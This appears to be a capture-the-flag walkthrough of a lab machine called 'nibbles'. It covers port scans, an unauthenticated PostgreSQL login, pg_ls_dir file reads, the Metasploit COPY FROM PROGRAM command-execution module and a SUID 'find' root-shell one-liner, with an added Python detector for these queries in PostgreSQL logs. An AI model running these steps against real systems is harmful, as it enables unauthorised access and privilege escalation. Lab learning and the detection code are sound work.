nmap -A -p- -oA nibbles 192.168.137.47 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA nibbles 192.168.137.47

nmap -sU -O -p- -oA nibbles-udp 192.168.137.47

nikto -h 192.168.137.47:80

whatweb http://192.168.137.47

psql -U postgres -p 5437 -h 192.168.137.47

Select pg_ls_dir('/home');

Select pg_ls_dir('/home/wilson/local.txt');

I tried to write a query that would give me a reverse shell, but it did not work for me.

use exploit/multi/postgres/postgres_copy_from_program_cmd_exec

We set LHOST, LPORT, RHOST, and RPORT.

We run it with run.
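
Seen from the database server's side, the pg_ls_dir queries and the COPY FROM PROGRAM module above both end up in the PostgreSQL statement log. The following is an added example, not part of the original notes, that flags them; it assumes log_statement = 'all' and log_line_prefix = '%m [%p] %u@%d ', and the sample log lines are constructed.

```python
import re

# Constructed sample lines in the shape PostgreSQL writes with
# log_statement = 'all' and log_line_prefix = '%m [%p] %u@%d ' (assumed settings).
SAMPLE_LOG = """\
2021-09-25 18:29:10.101 UTC [2201] postgres@postgres LOG:  statement: Select pg_ls_dir('/home');
2021-09-25 18:30:02.412 UTC [2201] postgres@postgres LOG:  statement: SELECT version();
2021-09-25 18:31:05.733 UTC [2310] postgres@postgres LOG:  statement: COPY "tmp_a1" FROM PROGRAM 'echo constructed-sample';
2021-09-25 18:31:40.019 UTC [2310] app@shop LOG:  statement: COPY orders FROM STDIN;
2021-09-25 18:32:11.500 UTC [2310] app@shop LOG:  statement: copy (select 1) to
\tprogram 'cat > /dev/null';
"""

ENTRY = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$")

RULES = {
    # Server-side command execution through COPY ... FROM/TO PROGRAM.
    "copy_program": re.compile(r"\bcopy\b.*?\b(?:from|to)\s+program\b", re.I | re.S),
    # Built-in functions that read the server's filesystem.
    "server_file_function": re.compile(
        r"\bpg_(?:ls_dir|read_file|read_binary_file|stat_file)\s*\(", re.I),
}

def entries(text):
    """Yield one dict per logged statement, folding tab-indented continuation lines."""
    current = None
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            if current:
                yield current
            current = m.groupdict()
        elif current and line.startswith("\t"):
            current["sql"] += "\n" + line.strip()
    if current:
        yield current

def findings(text):
    """Return (rule, user, db, sql) for every statement that matches a rule."""
    return [(name, e["user"], e["db"], e["sql"])
            for e in entries(text)
            for name, rx in RULES.items() if rx.search(e["sql"])]

if __name__ == "__main__":
    for name, user, db, sql in findings(SAMPLE_LOG):
        print(f"{name}: {user}@{db}: {sql!r}")
```

The rules match on statement text only, so a string literal that happens to contain the same words would also be flagged.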

echo $PATH

find / -perm -u=s -type f 2>/dev/null

find . -exec /bin/sh -p \; -quit

copyright©2022 Cu3rv0x all rights reserved